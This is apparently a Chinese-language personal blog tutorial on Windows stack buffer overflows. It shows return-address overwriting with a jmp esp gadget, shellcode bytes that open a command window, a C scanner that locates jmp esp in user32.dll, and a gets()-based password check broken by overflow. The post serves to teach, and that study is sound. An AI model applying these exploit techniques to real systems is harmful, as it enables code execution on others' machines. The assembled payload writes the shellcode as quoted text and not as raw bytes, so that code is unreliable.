<!DOCTYPE html><html lang="zh-CN"><head><meta name="generator" content="Hexo 3.9.0"><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><meta name="author" content="tfire,920242373@qq.com"><title>再谈栈溢出 · Enthusiasm And Focus</title><meta name="description" content="再谈栈溢出
​    上回书说到，向缓冲区内填充数据，如果数据很长，超过缓冲区本身容量，数据会溢出空间，覆盖合法数据。但是，可以精心设计溢出数据，造成攻击。

1. 本地缓冲区溢出简单利用已有条件：
1. 知道有问题程序返回点的精准地址，即可以把他覆盖成任意地址。
2. 有了shellcode。
3"><meta name="keywords" content="reversing,binary"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="renderer" content="webkit"><link rel="short icon" href="/images/favicon.png" type="image/x-icon"><link rel="stylesheet" href="/css/style.css"><link rel="stylesheet" href="/css/blog_basic.css"><link rel="stylesheet" href="/css/font-awesome.min.css"><link rel="alternate" type="application/atom+xml" title="ATOM 1.0" href="/atom.xml"></head><body><div class="sidebar animated fadeInDown"><div class="logo-title"><div class="title"><img src="/images/logo@2x.png" style="width:127px;"><h3 title><a href="/">Enthusiasm And Focus</a></h3><div class="description"><p>Enthusiasm And Focus</p></div></div></div><ul class="social-links"><li><a href="http://github.com/imtfire"><i class="fa fa-github"></i></a></li></ul><div class="footer"><a target="_blank" href="/"><span>Theme by </span></a><a href="https://www.caicai.me"> CaiCai </a><span>&</span><a href="https://github.com/Ben02/hexo-theme-Anatole"> Ben</a><div class="by_farbox"><a href="https://hexo.io/zh-cn/" target="_blank">Proudly published with Hexo&#65281;</a></div></div></div><div class="main"><div class="page-top animated fadeInDown"><div class="nav"><li><a href="/">首页</a></li><li><a href="/about">关于</a></li><li><a href="/archives">归档</a></li><li><a href="/links">友链</a></li></div><div class="information"><div class="back_btn"><li><a class="fa fa-chevron-left" onclick="window.history.go(-1)"> </a></li></div><div class="avatar"><img src="http://img3.imgtn.bdimg.com/it/u=3815386659,2045692924&amp;fm=26&amp;gp=0.jpg"></div></div></div><div class="autopagerize_page_element"><div class="content"><div class="post-page"><div class="post animated fadeInDown"><div class="post-title"><h3><a>再谈栈溢出</a></h3></div><div class="post-content"><h3 id="再谈栈溢出"><a href="#再谈栈溢出" class="headerlink" title="再谈栈溢出"></a><center>再谈栈溢出</center></h3><hr>
<p>​    上回书说到，向缓冲区内填充数据，如果数据很长，超过缓冲区本身容量，数据会溢出空间，覆盖合法数据。但是，可以精心设计溢出数据，造成攻击。</p>
<hr>
<h4 id="1-本地缓冲区溢出简单利用"><a href="#1-本地缓冲区溢出简单利用" class="headerlink" title="1. 本地缓冲区溢出简单利用"></a>1. 本地缓冲区溢出简单利用</h4><p>已有条件：</p>
<pre><code>1. 知道有问题程序返回点的精准地址，即可以把他覆盖成任意地址。
2. 有了shellcode。
3. 把有问题程序返回点地址覆盖成shellcode地址，即可成功利用缓冲区溢出。</code></pre><p>现在的目的：shellcode的地址是什么？即把返回点地址覆盖成什么？</p>
<p>​    在windows下利用系统核心dll里的指令完成跳转。</p>
<p>​    <strong>用系统核心dll中的jmp esp 地址来覆盖返回地址，然后把shellcode紧跟其后。</strong></p>
<p>​    利用格式：NNNNNNNNRSSSSSSSS，N=Nop，R=jmp esp，S=shellcode。</p>
<p>覆盖之后堆栈图示：</p>
<table>
<thead>
<tr>
<th align="center">…</th>
</tr>
</thead>
<tbody><tr>
<td align="center">Nop</td>
</tr>
<tr>
<td align="center">Nop</td>
</tr>
<tr>
<td align="center">Nop</td>
</tr>
<tr>
<td align="center">Jmp esp（原eip）</td>
</tr>
<tr>
<td align="center">S0</td>
</tr>
<tr>
<td align="center">S1</td>
</tr>
<tr>
<td align="center">S2</td>
</tr>
<tr>
<td align="center">s3</td>
</tr>
<tr>
<td align="center">…</td>
</tr>
</tbody></table>
<p>函数执行完成之后，esp指向原eip地址，而eip指向Ret指令</p>
<p>（eip指向下一条指令地址，Ret指令相当于pop eip）。</p>
<p>当eip被覆盖为 jmp esp之后，ret 相当于指向 jmp esp的地址。然后esp下移，指向S0，然后开始执行Shellcode。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1. EIP 指令指针指向下一条要执行的命令，一般会自动加 2. ESP 堆栈顶指针指向堆栈的顶部。在PUSH 时，ESP 往上走，减 1；在 POP 时，ESP 往下走，加 1。</span><br></pre></td></tr></table></figure>

<hr>
<h4 id="2-栈溢出的简单构筑"><a href="#2-栈溢出的简单构筑" class="headerlink" title="2. 栈溢出的简单构筑"></a>2. 栈溢出的简单构筑</h4><p>以一简单c为例：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;cstdio&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;cstring&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span>  <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">	<span class="keyword">char</span> name[] = <span class="string">"tfire"</span>;</span><br><span class="line">	<span class="keyword">char</span> output[<span class="number">8</span>];</span><br><span class="line">	<span class="built_in">strcpy</span>(output, name);</span><br><span class="line">	<span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i &lt; <span class="number">8</span>; i++) &#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"\\0x%x"</span>, output[i]);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>执行结果：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">\0x74\0x66\0x69\0x72\0x65\0x0\0xfffffffe\0xfffffffe</span><br></pre></td></tr></table></figure>

<p>给出转换表：</p>
<p><img src="/2019/08/05/再谈栈溢出/8.6.png" alt></p>
<p>给出shellcode机器码（功能为打开dos窗口）：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">char shellcode[]=</span><br><span class="line">&#123;</span><br><span class="line">0x8B,0xE5, 0x55,0x8B,0xEC,0x83,0xEC,0x0C,0xB8, 0x63,0x6F,0x6D,0x6D,0x6D,0x6D,0x6F,0x63,0x89, 0x45,0xF4,0xB8,0x61,0x6E,0x64,0x2E,0x89,0x45, 0xF8,0xB8,0x63,0x6F,0x6D,0x22,0x89,0x45,0xFC, 0x33,0xD2, 0x88,0x55,0xFF, 0x8D,0x45,0xF4,  0x50, 0xB8,0x24,0x98,0x01,0x78, 0xFF,0xD0</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>将name[]进行构造：</p>
<table>
<thead>
<tr>
<th align="center">name[8]</th>
<th align="center">ebp</th>
<th align="center">RET</th>
<th align="center">ShellCode</th>
</tr>
</thead>
<tbody><tr>
<td align="center">AAAAAAAA</td>
<td align="center">AAAA</td>
<td align="center">0x76388b13</td>
<td align="center">SSSSSSSS</td>
</tr>
</tbody></table>
<p><em>关于这个jmp esp的地址，会因为windows版本不同而不同。</em></p>
<p>在网上找了一个加载动态库esp地址的代码（这个还没看到…）</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span>, <span class="keyword">char</span>**, <span class="keyword">char</span>**)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	BYTE* pbyte;</span><br><span class="line">	<span class="keyword">int</span> nPos = <span class="number">0</span>, nAddr = <span class="number">0</span>;</span><br><span class="line">	HINSTANCE hHinst = <span class="literal">NULL</span>;</span><br><span class="line">	<span class="keyword">bool</span> bTips = <span class="literal">true</span>;</span><br><span class="line">	hHinst = LoadLibrary(<span class="string">"user32.dll"</span>);</span><br><span class="line">	<span class="keyword">if</span> (!hHinst) <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">	pbyte = (BYTE*)hHinst;</span><br><span class="line">	<span class="keyword">while</span> (bTips)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="keyword">if</span> (pbyte[nPos] == <span class="number">0xff</span> &amp;&amp; pbyte[nPos + <span class="number">1</span>] == <span class="number">0xe4</span>)</span><br><span class="line">		&#123;</span><br><span class="line">			nAddr = (<span class="keyword">int</span>)pbyte + nPos;</span><br><span class="line">			<span class="built_in">printf</span>(<span class="string">"address is 0x%x\n"</span>, nAddr);</span><br><span class="line">			bTips = <span class="literal">false</span>;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">else</span></span><br><span class="line">			nPos++;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span> (hHinst != <span class="literal">NULL</span>) FreeLibrary(hHinst);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>输出地址：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0x76388b13</span><br></pre></td></tr></table></figure>

<p>将代码合并整理：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">char</span> name[]=</span><br><span class="line">&#123;</span><br><span class="line"> <span class="string">"\x41\x41\x41\x41\x41\x41\x41\x41"</span><span class="comment">//name=AAAA</span></span><br><span class="line"> <span class="string">"\x41\x41\x41\x41"</span>   <span class="comment">//ebp=AAAA   </span></span><br><span class="line"> <span class="string">"\x13\x8b\x38\x76"</span>   <span class="comment">//覆盖成jmp esp地址</span></span><br><span class="line"> <span class="string">"0x8B,0xE5,    0x55,0x8B,0xEC,0x83,0xEC,0x0C,0xB8, 0x63,0x6F,0x6D,0x6D,0x6D,0x6D,0x6F,0x63,0x89, 0x45,0xF4,0xB8,0x61,0x6E,0x64,0x2E,0x89,0x45, 0xF8,0xB8,0x63,0x6F,0x6D,0x22,0x89,0x45,0xFC, 0x33,0xD2, 0x88,0x55,0xFF, 0x8D,0x45,0xF4,  0x50, 0xB8,0x24,0x98,0x01,0x78, 0xFF,0xD0"</span></span><br><span class="line">     <span class="comment">//此处为shellcode地址，功能为打开dos窗口</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>接下来执行程序，明明是字符串的复制，却会打开dos窗口，至此，缓冲区溢出构建完成。</p>
<hr>
<h4 id="3-溢出实例"><a href="#3-溢出实例" class="headerlink" title="3. 溢出实例"></a>3. 溢出实例</h4><p>看一个简单代码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> * argv[])</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">char</span> passsword[<span class="number">8</span>] = <span class="string">"secret"</span>, input[<span class="number">8</span>];</span><br><span class="line">    <span class="keyword">while</span> (<span class="number">1</span>) &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">"Enter your password:"</span>);</span><br><span class="line">        gets(input);</span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">strcmp</span>(input, passsword) == <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">"Welcome!\n"</span>);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;<span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">"Sorry,your password is wrong.\n"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>看看结果吧</p>
<p><img src="/2019/08/05/再谈栈溢出/8.5.png" alt></p>
<p>What？？</p>
<p>输入ok居然对了？？</p>
<p>这就是缓冲区溢出造成的，具体已经解释过了，着迷人的魅力啊~</p>
</div><div class="post-footer"><div class="meta"><div class="info"><i class="fa fa-sun-o"></i><span class="date">2019-08-05</span><i class="fa fa-tag"></i><a class="tag" href="/tags/二进制/" title="二进制">二进制 </a></div></div></div></div><div class="share"><div class="evernote"><a class="fa fa-bookmark" href="javascript:(function(){EN_CLIP_HOST='http://www.evernote.com';try{var%20x=document.createElement('SCRIPT');x.type='text/javascript';x.src=EN_CLIP_HOST+'/public/bookmarkClipper.js?'+(new%20Date().getTime()/100000);document.getElementsByTagName('head')[0].appendChild(x);}catch(e){location.href=EN_CLIP_HOST+'/clip.action?url='+encodeURIComponent(location.href)+'&amp;title='+encodeURIComponent(document.title);}})();" ref="nofollow" target="_blank"></a></div><div class="weibo"><a class="fa fa-weibo" href="javascript:void((function(s,d,e){try{}catch(e){}var f='http://service.weibo.com/share/share.php?',u=d.location.href,p=['url=',e(u),'&amp;title=',e(d.title),'&amp;appkey=2924220432'].join('');function a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=620,height=450,left=',(s.width-620)/2,',top=',(s.height-450)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent)){setTimeout(a,0)}else{a()}})(screen,document,encodeURIComponent));"></a></div><div class="twitter"><a class="fa fa-twitter" href="http://twitter.com/home?status=,http://yoursite.com/2019/08/05/再谈栈溢出/,Enthusiasm And Focus,再谈栈溢出,;"></a></div></div><div class="pagination"><ul class="clearfix"><li class="pre pagbuttons"><a class="btn" role="navigation" href="/2019/08/09/逆向之脱壳浅谈/" title="逆向之脱壳浅谈">上一篇</a></li><li class="next pagbuttons"><a class="btn" role="navigation" href="/2019/08/02/几种加密算法/" title="几种加密算法">下一篇</a></li></ul></div><a id="comments"></a><div id="vcomments" style="margin:0 30px;"></div><script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="//cdn.jsdelivr.net/gh/xcss/valine@v1.1.7/dist/Valine.min.js?v=undefined"></script><script>var valine = new Valine({
  el:'#vcomments',
  notify:false || false, 
  verify:false|| false, 
  app_id:'SFK5yHWunrCEEyxDqf7fJCj0-gzGzoHsz',
  app_key:'V9S8KBSzD9AldPkQ2k2Qk49S',
  placeholder:'Just go go',
  path: window.location.pathname,
  avatar:'mm'
})</script></div></div></div></div><script src="/js/jquery.js"></script><script src="/js/jquery-migrate-1.2.1.min.js"></script><script src="/js/jquery.appear.js"></script></body></html>